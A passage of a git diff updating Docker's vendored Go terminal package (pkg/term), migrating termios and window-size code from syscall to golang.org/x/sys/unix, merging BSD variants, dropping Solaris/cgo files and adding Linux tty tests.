+	escapeKeys, _ = ToBytes("DEL")
+	keys, _ = ToBytes("a,b,c,+")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys)))
+	assert.DeepEqual(t, keys, buf)
+
+	keys, _ = ToBytes("")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read")
+	assert.Equal(t, nr, 0, "nr should be zero")
+	assert.Check(t, is.Len(keys, 0))
+	assert.Check(t, is.Len(buf, 0))
+
+	escapeKeys, _ = ToBytes("ctrl-x,ctrl-@")
+	keys, _ = ToBytes("DEL")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, 1, fmt.Sprintf("nr %d should be equal to the number of 1", nr))
+	assert.DeepEqual(t, keys, buf)
+
+	escapeKeys, _ = ToBytes("ctrl-c")
+	keys, _ = ToBytes("ctrl-c")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.Error(t, err, "read escape sequence")
+	assert.Equal(t, nr, 0, "nr should be equal to 0")
+	assert.DeepEqual(t, keys, buf)
+
+	escapeKeys, _ = ToBytes("ctrl-c,ctrl-z")
+	keys, _ = ToBytes("ctrl-c,ctrl-z")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, 1)
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, 0, "nr should be equal to 0")
+	assert.DeepEqual(t, keys[0:1], buf)
+	nr, err = reader.Read(buf)
+	assert.Error(t, err, "read escape sequence")
+	assert.Equal(t, nr, 0, "nr should be equal to 0")
+	assert.DeepEqual(t, keys[1:], buf)
+
+	escapeKeys, _ = ToBytes("ctrl-c,ctrl-z")
+	keys, _ = ToBytes("ctrl-c,DEL,+")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, 1)
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, 0, "nr should be equal to 0")
+	assert.DeepEqual(t, keys[0:1], buf)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, len(keys), fmt.Sprintf("nr should be equal to %d", len(keys)))
+	assert.DeepEqual(t, keys, buf)
+
+	escapeKeys, _ = ToBytes("ctrl-c,ctrl-z")
+	keys, _ = ToBytes("ctrl-c,DEL")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, 1)
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, 0, "nr should be equal to 0")
+	assert.DeepEqual(t, keys[0:1], buf)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, len(keys), fmt.Sprintf("nr should be equal to %d", len(keys)))
+	assert.DeepEqual(t, keys, buf)
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc.go b/vendor/github.com/docker/docker/pkg/term/tc.go
new file mode 100644
index 0000000000..01bcaa8abb
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/tc.go
@@ -0,0 +1,20 @@
+// +build !windows
+
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"syscall"
+	"unsafe"
+
+	"golang.org/x/sys/unix"
+)
+
+func tcget(fd uintptr, p *Termios) syscall.Errno {
+	_, _, err := unix.Syscall(unix.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p)))
+	return err
+}
+
+func tcset(fd uintptr, p *Termios) syscall.Errno {
+	_, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p)))
+	return err
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
deleted file mode 100644
index 59dac5ba8e..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go
+++ /dev/null
@@ -1,50 +0,0 @@
-// +build linux,cgo
-
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-// #include <termios.h>
-import "C"
-
-// Termios is the Unix API for terminal I/O.
-// It is passthrough for syscall.Termios in order to make it portable with
-// other platforms where it is not available or handled differently.
-type Termios syscall.Termios
-
-// MakeRaw put the terminal connected to the given file descriptor into raw
-// mode and returns the previous state of the terminal so that it can be
-// restored.
-func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if err := tcget(fd, &oldState.termios); err != 0 {
-		return nil, err
-	}
-
-	newState := oldState.termios
-
-	C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState)))
-	if err := tcset(fd, &newState); err != 0 {
-		return nil, err
-	}
-	return &oldState, nil
-}
-
-func tcget(fd uintptr, p *Termios) syscall.Errno {
-	ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p)))
-	if ret != 0 {
-		return err.(syscall.Errno)
-	}
-	return 0
-}
-
-func tcset(fd uintptr, p *Termios) syscall.Errno {
-	ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p)))
-	if ret != 0 {
-		return err.(syscall.Errno)
-	}
-	return 0
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go
deleted file mode 100644
index 750d7c3f60..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/tc_other.go
+++ /dev/null
@@ -1,20 +0,0 @@
-// +build !windows
-// +build !linux !cgo
-// +build !solaris !cgo
-
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-func tcget(fd uintptr, p *Termios) syscall.Errno {
-	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p)))
-	return err
-}
-
-func tcset(fd uintptr, p *Termios) syscall.Errno {
-	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p)))
-	return err
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
deleted file mode 100644
index c9139d0ca8..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go
+++ /dev/null
@@ -1,63 +0,0 @@
-// +build solaris,cgo
-
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-// #include <termios.h>
-import "C"
-
-// Termios is the Unix API for terminal I/O.
-// It is passthrough for syscall.Termios in order to make it portable with
-// other platforms where it is not available or handled differently.
-type Termios syscall.Termios
-
-// MakeRaw put the terminal connected to the given file descriptor into raw
-// mode and returns the previous state of the terminal so that it can be
-// restored.
-func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if err := tcget(fd, &oldState.termios); err != 0 {
-		return nil, err
-	}
-
-	newState := oldState.termios
-
-	newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY)
-	newState.Oflag &^= syscall.OPOST
-	newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN)
-	newState.Cflag &^= (syscall.CSIZE | syscall.PARENB)
-	newState.Cflag |= syscall.CS8
-
-	/*
-		VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned
-		Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It
-		needs to be explicitly set to 1.
-	*/
-	newState.Cc[C.VMIN] = 1
-	newState.Cc[C.VTIME] = 0
-
-	if err := tcset(fd, &newState); err != 0 {
-		return nil, err
-	}
-	return &oldState, nil
-}
-
-func tcget(fd uintptr, p *Termios) syscall.Errno {
-	ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p)))
-	if ret != 0 {
-		return err.(syscall.Errno)
-	}
-	return 0
-}
-
-func tcset(fd uintptr, p *Termios) syscall.Errno {
-	ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p)))
-	if ret != 0 {
-		return err.(syscall.Errno)
-	}
-	return 0
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go
index fe59faa949..0589a95519 100644
--- a/vendor/github.com/docker/docker/pkg/term/term.go
+++ b/vendor/github.com/docker/docker/pkg/term/term.go
@@ -2,7 +2,7 @@
 
 // Package term provides structures and helper functions to work with
 // terminal (state, sizes).
-package term
+package term // import "github.com/docker/docker/pkg/term"
 
 import (
 	"errors"
@@ -10,7 +10,8 @@ import (
 	"io"
 	"os"
 	"os/signal"
-	"syscall"
+
+	"golang.org/x/sys/unix"
 )
 
 var (
@@ -31,7 +32,7 @@ type Winsize struct {
 	y      uint16
 }
 
-// StdStreams returns the standard streams (stdin, stdout, stedrr).
+// StdStreams returns the standard streams (stdin, stdout, stderr).
 func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
 	return os.Stdin, os.Stdout, os.Stderr
 }
@@ -79,7 +80,7 @@ func SaveState(fd uintptr) (*State, error) {
 // descriptor, with echo disabled.
 func DisableEcho(fd uintptr, state *State) error {
 	newState := state.termios
-	newState.Lflag &^= syscall.ECHO
+	newState.Lflag &^= unix.ECHO
 
 	if err := tcset(fd, &newState); err != 0 {
 		return err
diff --git a/vendor/github.com/docker/docker/pkg/term/term_linux_test.go b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go
new file mode 100644
index 0000000000..272395a10e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/term_linux_test.go
@@ -0,0 +1,117 @@
+//+build linux
+
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/google/go-cmp/cmp"
+	"gotest.tools/assert"
+)
+
+// RequiresRoot skips tests that require root, unless the test.root flag has
+// been set
+func RequiresRoot(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("skipping test that requires root")
+		return
+	}
+}
+
+func newTtyForTest(t *testing.T) (*os.File, error) {
+	RequiresRoot(t)
+	return os.OpenFile("/dev/tty", os.O_RDWR, os.ModeDevice)
+}
+
+func newTempFile() (*os.File, error) {
+	return ioutil.TempFile(os.TempDir(), "temp")
+}
+
+func TestGetWinsize(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	winSize, err := GetWinsize(tty.Fd())
+	assert.NilError(t, err)
+	assert.Assert(t, winSize != nil)
+
+	newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y}
+	err = SetWinsize(tty.Fd(), &newSize)
+	assert.NilError(t, err)
+	winSize, err = GetWinsize(tty.Fd())
+	assert.NilError(t, err)
+	assert.DeepEqual(t, *winSize, newSize, cmpWinsize)
+}
+
+var cmpWinsize = cmp.AllowUnexported(Winsize{})
+
+func TestSetWinsize(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	winSize, err := GetWinsize(tty.Fd())
+	assert.NilError(t, err)
+	assert.Assert(t, winSize != nil)
+	newSize := Winsize{Width: 200, Height: 200, x: winSize.x, y: winSize.y}
+	err = SetWinsize(tty.Fd(), &newSize)
+	assert.NilError(t, err)
+	winSize, err = GetWinsize(tty.Fd())
+	assert.NilError(t, err)
+	assert.DeepEqual(t, *winSize, newSize, cmpWinsize)
+}
+
+func TestGetFdInfo(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	inFd, isTerminal := GetFdInfo(tty)
+	assert.Equal(t, inFd, tty.Fd())
+	assert.Equal(t, isTerminal, true)
+	tmpFile, err := newTempFile()
+	assert.NilError(t, err)
+	defer tmpFile.Close()
+	inFd, isTerminal = GetFdInfo(tmpFile)
+	assert.Equal(t, inFd, tmpFile.Fd())
+	assert.Equal(t, isTerminal, false)
+}
+
+func TestIsTerminal(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	isTerminal := IsTerminal(tty.Fd())
+	assert.Equal(t, isTerminal, true)
+	tmpFile, err := newTempFile()
+	assert.NilError(t, err)
+	defer tmpFile.Close()
+	isTerminal = IsTerminal(tmpFile.Fd())
+	assert.Equal(t, isTerminal, false)
+}
+
+func TestSaveState(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	state, err := SaveState(tty.Fd())
+	assert.NilError(t, err)
+	assert.Assert(t, state != nil)
+	tty, err = newTtyForTest(t)
+	assert.NilError(t, err)
+	defer tty.Close()
+	err = RestoreTerminal(tty.Fd(), state)
+	assert.NilError(t, err)
+}
+
+func TestDisableEcho(t *testing.T) {
+	tty, err := newTtyForTest(t)
+	defer tty.Close()
+	assert.NilError(t, err)
+	state, err := SetRawTerminal(tty.Fd())
+	defer RestoreTerminal(tty.Fd(), state)
+	assert.NilError(t, err)
+	assert.Assert(t, state != nil)
+	err = DisableEcho(tty.Fd(), state)
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go
deleted file mode 100644
index 112debbec5..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/term_solaris.go
+++ /dev/null
@@ -1,41 +0,0 @@
-// +build solaris
-
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-/*
-#include <unistd.h>
-#include <stropts.h>
-#include <termios.h>
-
-// Small wrapper to get rid of variadic args of ioctl()
-int my_ioctl(int fd, int cmd, struct winsize *ws) {
-	return ioctl(fd, cmd, ws);
-}
-*/
-import "C"
-
-// GetWinsize returns the window size based on the specified file descriptor.
-func GetWinsize(fd uintptr) (*Winsize, error) {
-	ws := &Winsize{}
-	ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws)))
-	// Skip retval = 0
-	if ret == 0 {
-		return ws, nil
-	}
-	return ws, err
-}
-
-// SetWinsize tries to set the specified window size for the specified file descriptor.
-func SetWinsize(fd uintptr, ws *Winsize) error {
-	ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws)))
-	// Skip retval = 0
-	if ret == 0 {
-		return nil
-	}
-	return err
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go
deleted file mode 100644
index ddf87a0e58..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/term_unix.go
+++ /dev/null
@@ -1,29 +0,0 @@
-// +build !solaris,!windows
-
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-// GetWinsize returns the window size based on the specified file descriptor.
-func GetWinsize(fd uintptr) (*Winsize, error) {
-	ws := &Winsize{}
-	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws)))
-	// Skipp errno = 0
-	if err == 0 {
-		return ws, nil
-	}
-	return ws, err
-}
-
-// SetWinsize tries to set the specified window size for the specified file descriptor.
-func SetWinsize(fd uintptr, ws *Winsize) error {
-	_, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws)))
-	// Skipp errno = 0
-	if err == 0 {
-		return nil
-	}
-	return err
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go
index a91f07e482..64ead3c53b 100644
--- a/vendor/github.com/docker/docker/pkg/term/term_windows.go
+++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go
@@ -1,12 +1,10 @@
-// +build windows
-
-package term
+package term // import "github.com/docker/docker/pkg/term"
 
 import (
 	"io"
 	"os"
 	"os/signal"
-	"syscall"
+	"syscall" // used for STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and STD_ERROR_HANDLE
 
 	"github.com/Azure/go-ansiterm/winterm"
 	"github.com/docker/docker/pkg/term/windows"
@@ -23,25 +21,18 @@ type Winsize struct {
 	Width  uint16
 }
 
-const (
-	// https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx
-	enableVirtualTerminalInput      = 0x0200
-	enableVirtualTerminalProcessing = 0x0004
-	disableNewlineAutoReturn        = 0x0008
-)
-
-// vtInputSupported is true if enableVirtualTerminalInput is supported by the console
+// vtInputSupported is true if winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported by the console
 var vtInputSupported bool
 
-// StdStreams returns the standard streams (stdin, stdout, stedrr).
+// StdStreams returns the standard streams (stdin, stdout, stderr).
 func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
 	// Turn on VT handling on all std handles, if possible. This might
 	// fail, in which case we will fall back to terminal emulation.
 	var emulateStdin, emulateStdout, emulateStderr bool
 	fd := os.Stdin.Fd()
 	if mode, err := winterm.GetConsoleMode(fd); err == nil {
-		// Validate that enableVirtualTerminalInput is supported, but do not set it.
-		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil {
+		// Validate that winterm.ENABLE_VIRTUAL_TERMINAL_INPUT is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_INPUT); err != nil {
 			emulateStdin = true
 		} else {
 			vtInputSupported = true
@@ -53,21 +44,21 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
 
 	fd = os.Stdout.Fd()
 	if mode, err := winterm.GetConsoleMode(fd); err == nil {
-		// Validate disableNewlineAutoReturn is supported, but do not set it.
-		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil {
+		// Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil {
 			emulateStdout = true
 		} else {
-			winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing)
+			winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING)
 		}
 	}
 
 	fd = os.Stderr.Fd()
 	if mode, err := winterm.GetConsoleMode(fd); err == nil {
-		// Validate disableNewlineAutoReturn is supported, but do not set it.
-		if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil {
+		// Validate winterm.DISABLE_NEWLINE_AUTO_RETURN is supported, but do not set it.
+		if err = winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING|winterm.DISABLE_NEWLINE_AUTO_RETURN); err != nil {
 			emulateStderr = true
 		} else {
-			winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing)
+			winterm.SetConsoleMode(fd, mode|winterm.ENABLE_VIRTUAL_TERMINAL_PROCESSING)
 		}
 	}
 
@@ -78,20 +69,24 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
 		emulateStderr = false
 	}
 
+	// Temporarily use STD_INPUT_HANDLE, STD_OUTPUT_HANDLE and
+	// STD_ERROR_HANDLE from syscall rather than x/sys/windows as long as
+	// go-ansiterm hasn't switch to x/sys/windows.
+	// TODO: switch back to x/sys/windows once go-ansiterm has switched
 	if emulateStdin {
-		stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE)
+		stdIn = windowsconsole.NewAnsiReader(syscall.STD_INPUT_HANDLE)
 	} else {
 		stdIn = os.Stdin
 	}
 
 	if emulateStdout {
-		stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE)
+		stdOut = windowsconsole.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE)
 	} else {
 		stdOut = os.Stdout
 	}
 
 	if emulateStderr {
-		stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE)
+		stdErr = windowsconsole.NewAnsiWriter(syscall.STD_ERROR_HANDLE)
 	} else {
 		stdErr = os.Stderr
 	}
@@ -101,7 +96,7 @@ func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) {
 
 // GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal.
 func GetFdInfo(in interface{}) (uintptr, bool) {
-	return windows.GetHandleInfo(in)
+	return windowsconsole.GetHandleInfo(in)
 }
 
 // GetWinsize returns the window size based on the specified file descriptor.
@@ -121,7 +116,7 @@ func GetWinsize(fd uintptr) (*Winsize, error) {
 
 // IsTerminal returns true if the given file descriptor is a terminal.
 func IsTerminal(fd uintptr) bool {
-	return windows.IsConsole(fd)
+	return windowsconsole.IsConsole(fd)
 }
 
 // RestoreTerminal restores the terminal connected to the given file descriptor
@@ -179,9 +174,9 @@ func SetRawTerminalOutput(fd uintptr) (*State, error) {
 		return nil, err
 	}
 
-	// Ignore failures, since disableNewlineAutoReturn might not be supported on this
+	// Ignore failures, since winterm.DISABLE_NEWLINE_AUTO_RETURN might not be supported on this
 	// version of Windows.
-	winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn)
+	winterm.SetConsoleMode(fd, state.mode|winterm.DISABLE_NEWLINE_AUTO_RETURN)
 	return state, err
 }
 
@@ -211,7 +206,7 @@ func MakeRaw(fd uintptr) (*State, error) {
 	mode |= winterm.ENABLE_INSERT_MODE
 	mode |= winterm.ENABLE_QUICK_EDIT_MODE
 	if vtInputSupported {
-		mode |= enableVirtualTerminalInput
+		mode |= winterm.ENABLE_VIRTUAL_TERMINAL_INPUT
 	}
 
 	err = winterm.SetConsoleMode(fd, mode)
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_bsd.go b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go
new file mode 100644
index 0000000000..48b16f5203
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/termios_bsd.go
@@ -0,0 +1,42 @@
+// +build darwin freebsd openbsd netbsd
+
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"unsafe"
+
+	"golang.org/x/sys/unix"
+)
+
+const (
+	getTermios = unix.TIOCGETA
+	setTermios = unix.TIOCSETA
+)
+
+// Termios is the Unix API for terminal I/O.
+type Termios unix.Termios
+
+// MakeRaw put the terminal connected to the given file descriptor into raw
+// mode and returns the previous state of the terminal so that it can be
+// restored.
+func MakeRaw(fd uintptr) (*State, error) {
+	var oldState State
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
+		return nil, err
+	}
+
+	newState := oldState.termios
+	newState.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON)
+	newState.Oflag &^= unix.OPOST
+	newState.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN)
+	newState.Cflag &^= (unix.CSIZE | unix.PARENB)
+	newState.Cflag |= unix.CS8
+	newState.Cc[unix.VMIN] = 1
+	newState.Cc[unix.VTIME] = 0
+
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 {
+		return nil, err
+	}
+
+	return &oldState, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go
deleted file mode 100644
index 480db900ac..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-const (
-	getTermios = syscall.TIOCGETA
-	setTermios = syscall.TIOCSETA
-)
-
-// Termios magic numbers, passthrough to the ones defined in syscall.
-const (
-	IGNBRK = syscall.IGNBRK
-	PARMRK = syscall.PARMRK
-	INLCR  = syscall.INLCR
-	IGNCR  = syscall.IGNCR
-	ECHONL = syscall.ECHONL
-	CSIZE  = syscall.CSIZE
-	ICRNL  = syscall.ICRNL
-	ISTRIP = syscall.ISTRIP
-	PARENB = syscall.PARENB
-	ECHO   = syscall.ECHO
-	ICANON = syscall.ICANON
-	ISIG   = syscall.ISIG
-	IXON   = syscall.IXON
-	BRKINT = syscall.BRKINT
-	INPCK  = syscall.INPCK
-	OPOST  = syscall.OPOST
-	CS8    = syscall.CS8
-	IEXTEN = syscall.IEXTEN
-)
-
-// Termios is the Unix API for terminal I/O.
-type Termios struct {
-	Iflag  uint64
-	Oflag  uint64
-	Cflag  uint64
-	Lflag  uint64
-	Cc     [20]byte
-	Ispeed uint64
-	Ospeed uint64
-}
-
-// MakeRaw put the terminal connected to the given file descriptor into raw
-// mode and returns the previous state of the terminal so that it can be
-// restored.
-func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
-		return nil, err
-	}
-
-	newState := oldState.termios
-	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
-	newState.Oflag &^= OPOST
-	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
-	newState.Cflag &^= (CSIZE | PARENB)
-	newState.Cflag |= CS8
-	newState.Cc[syscall.VMIN] = 1
-	newState.Cc[syscall.VTIME] = 0
-
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
-		return nil, err
-	}
-
-	return &oldState, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
deleted file mode 100644
index ed843ad69c..0000000000
--- a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package term
-
-import (
-	"syscall"
-	"unsafe"
-)
-
-const (
-	getTermios = syscall.TIOCGETA
-	setTermios = syscall.TIOCSETA
-)
-
-// Termios magic numbers, passthrough to the ones defined in syscall.
-const (
-	IGNBRK = syscall.IGNBRK
-	PARMRK = syscall.PARMRK
-	INLCR  = syscall.INLCR
-	IGNCR  = syscall.IGNCR
-	ECHONL = syscall.ECHONL
-	CSIZE  = syscall.CSIZE
-	ICRNL  = syscall.ICRNL
-	ISTRIP = syscall.ISTRIP
-	PARENB = syscall.PARENB
-	ECHO   = syscall.ECHO
-	ICANON = syscall.ICANON
-	ISIG   = syscall.ISIG
-	IXON   = syscall.IXON
-	BRKINT = syscall.BRKINT
-	INPCK  = syscall.INPCK
-	OPOST  = syscall.OPOST
-	CS8    = syscall.CS8
-	IEXTEN = syscall.IEXTEN
-)
-
-// Termios is the Unix API for terminal I/O.
-type Termios struct {
-	Iflag  uint32
-	Oflag  uint32
-	Cflag  uint32
-	Lflag  uint32
-	Cc     [20]byte
-	Ispeed uint32
-	Ospeed uint32
-}
-
-// MakeRaw put the terminal connected to the given file descriptor into raw
-// mode and returns the previous state of the terminal so that it can be
-// restored.
-func MakeRaw(fd uintptr) (*State, error) {
-	var oldState State
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 {
-		return nil, err
-	}
-
-	newState := oldState.termios
-	newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON)
-	newState.Oflag &^= OPOST
-	newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN)
-	newState.Cflag &^= (CSIZE | PARENB)
-	newState.Cflag |= CS8
-	newState.Cc[syscall.VMIN] = 1
-	newState.Cc[syscall.VTIME] = 0
-
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 {
-		return nil, err
-	}
-
-	return &oldState, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go
index 22921b6aef..6d4c63fdb7 100644
--- a/vendor/github.com/docker/docker/pkg/term/termios_linux.go
+++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go
@@ -1,46 +1,38 @@
-// +build !cgo
-
-package term
+package term // import "github.com/docker/docker/pkg/term"
 
 import (
-	"syscall"
-	"unsafe"
+	"golang.org/x/sys/unix"
 )
 
 const (
-	getTermios = syscall.TCGETS
-	setTermios = syscall.TCSETS
+	getTermios = unix.TCGETS
+	setTermios = unix.TCSETS
 )
 
 // Termios is the Unix API for terminal I/O.
-type Termios struct {
-	Iflag  uint32
-	Oflag  uint32
-	Cflag  uint32
-	Lflag  uint32
-	Cc     [20]byte
-	Ispeed uint32
-	Ospeed uint32
-}
+type Termios unix.Termios
 
 // MakeRaw put the terminal connected to the given file descriptor into raw
